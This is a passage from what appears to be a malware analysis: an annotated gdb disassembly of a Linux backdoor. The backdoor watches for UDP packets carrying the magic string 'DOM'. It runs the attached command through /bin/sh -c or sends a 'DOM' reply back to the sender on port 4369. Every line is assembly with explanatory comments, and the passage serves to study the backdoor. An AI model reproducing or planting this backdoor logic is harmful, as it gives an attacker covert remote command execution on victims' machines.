$0x11,%al #byte 0x17 of the frame = IP protocol (14 eth + 9, assumes a 20-byte IP header); 0x11 == UDP 0x80487d4: jne 0x804880d #not UDP: popa ret 0x80487d6: jmp 0x80487db #jmp bottom 0x80487d8: pop %eax 0x80487d9: jmp *%eax #jmp 0x80487e0 0x80487db: call 0x80487d8 0x80487e0: sub $0x17,%eax #DOM 0x80487e5: lea 0x2a(%esi),%ebx #UDP payload (14 eth + 20 ip + 8 udp) 0x80487e8: mov $0x3,%ecx 0x80487ed: call 0x8048506 #zen-parse says it's memcmp (returns 1 on match) 0x80487f2: cmp $0x0,%eax 0x80487f7: je 0x804880d #strings didn't match 0x80487f9: lea 0x2d(%esi),%eax #command byte following "DOM" 0x80487fc: lea 0x2e(%esi),%edi #rest of payload: command string 0x80487ff: cmpb $0x1,(%eax) 0x8048802: je 0x804882a 0x8048804: cmpb $0x2,(%eax) 0x8048807: je 0x804888e 0x804880d: popa 0x804880e: ret #returns to 0x8048a14 (gdb) x/i 0x8048506 0x8048506: push %ebx 0x8048507: push %ecx 0x8048508: push %edx 0x8048509: push %esi 0x804850a: push %edi 0x804850b: mov %eax,%esi 0x804850d: mov %ebx,%edi 0x804850f: mov (%esi),%al 0x8048511: mov (%edi),%bl 0x8048513: cmp %bl,%al 0x8048515: jne 0x804852d 0x8048517: inc %esi 0x8048518: inc %edi 0x8048519: dec %ecx 0x804851a: cmp $0x0,%ecx 0x8048520: ja 0x804850f #loop 0x8048522: mov $0x1,%eax 0x8048527: pop %edi 0x8048528: pop %esi 0x8048529: pop %edx 0x804852a: pop %ecx 0x804852b: pop %ebx 0x804852c: ret #returns to 0x80487f2 0x804852d: mov $0x0,%eax 0x8048532: pop %edi 0x8048533: pop %esi 0x8048534: pop %edx 0x8048535: pop %ecx 0x8048536: pop %ebx 0x8048537: ret #return to 0x8048517 (gdb) x/i 0x804882a 0x804882a: mov $0x2,%eax #fork 0x804882f: int $0x80 0x8048831: cmp $0x0,%eax 0x8048836: jne 0x804888c #parent 0x8048838: jmp 0x804883d #child PARENT (gdb) x/i 0x804888c 0x804888c: popa 0x804888d: ret #returns to 0x8048804 (gdb) x/i 0x804888e 0x804888e: mov $0x10,%eax 0x8048893: call 0x8048499 0x8048898: cmp $0x0,%eax #error checking 0x804889d: je 0x8048917 0x804889f: mov %eax,%edx 0x80488a1: movw $0x2,(%edx) #AF_INET 0x80488a6: movw $0x1111,0x2(%edx) #port 0x1111 (4369) 0x80488ac: mov 0x1a(%esi),%eax #IP source address of the received frame (14 + 12) 0x80488af: mov %eax,0x4(%edx) #reply goes back to the sender 0x80488b2: mov %edx,%esi 0x80488b4: mov $0x2,%eax #PF_INET 0x80488b9: mov $0x2,%ebx #SOCK_DGRAM 0x80488be: mov $0x11,%ecx #UDP 0x80488c3: call 0x8048538 0x80488c8: 
mov %eax,%edi 0x80488ca: cmp $0x0,%eax #error checking for socketcall 0x80488cf: jl 0x8048917 0x80488d1: push $0x10 #to length 0x80488d6: push %esi #buffer read in(sockaddr *to) 0x80488d7: push $0x0 #flags 0x80488dc: push $0x3 #length 0x80488e1: jmp 0x80488e6 #jmp bottom 0x80488e3: pop %eax 0x80488e4: jmp *%eax #jmp 0x80488eb 0x80488e6: call 0x80488e3 0x80488eb: sub $0x122,%eax 0x80488f0: push %eax #"DOM" 0x80488f1: push %edi #fd 0x80488f2: mov %esp,%ecx 0x80488f4: push %ebx 0x80488f5: push %ecx 0x80488f6: mov $0x66,%eax #socketcall 0x80488fb: mov $0xb,%ebx 0x8048900: mov %ecx,%ecx #socketcall(SYS_SENDTO,args); 0x8048902: int $0x80 0x8048904: pop %ecx 0x8048905: pop %ebx 0x8048906: pop %eax 0x8048907: pop %eax 0x8048908: pop %eax 0x8048909: pop %eax 0x804890a: pop %eax 0x804890b: pop %eax 0x804890c: mov $0x6,%eax #close 0x8048911: push %ebx 0x8048912: mov %edi,%ebx 0x8048914: int $0x80 0x8048916: pop %ebx 0x8048917: popa 0x8048918: ret #returns to 0x804880d CHILD (gdb) x/i 0x804883a 0x804883a: pop %eax 0x804883b: jmp *%eax #jmp 0x8048842 0x804883d: call 0x804883a 0x8048842: sub $0x28,%eax 0x8048847: mov %eax,%esi #"xxxxyyyyzzzz" 0x8048849: jmp 0x804884e #jmp bottom 0x804884b: pop %eax 0x804884c: jmp *%eax #jmp 0x8048853 0x804884e: call 0x804884b 0x8048853: sub $0x44,%eax 0x8048858: mov %eax,(%esi) #"/bin/sh" 0x804885a: jmp 0x804885f #jmp bottom 0x804885c: pop %eax 0x804885d: jmp *%eax #0x8048864 0x804885f: call 0x804885c 0x8048864: sub $0x4d,%eax 0x8048869: mov %eax,0x4(%esi) #"-c" 0x804886c: mov %edi,0x8(%esi) #command read in 0x804886f: push %ebx 0x8048870: push %ecx 0x8048871: push %edx 0x8048872: mov $0xb,%eax #execve 0x8048877: mov (%esi),%ebx 0x8048879: mov %esi,%ecx 0x804887b: mov $0x0,%edx 0x8048880: int $0x80 0x8048882: pop %edx 0x8048883: pop %ecx 0x8048884: pop %ebx 0x8048885: mov $0x1,%eax #exit 0x804888a: int $0x80 0x804888c: popa 0x804888d: ret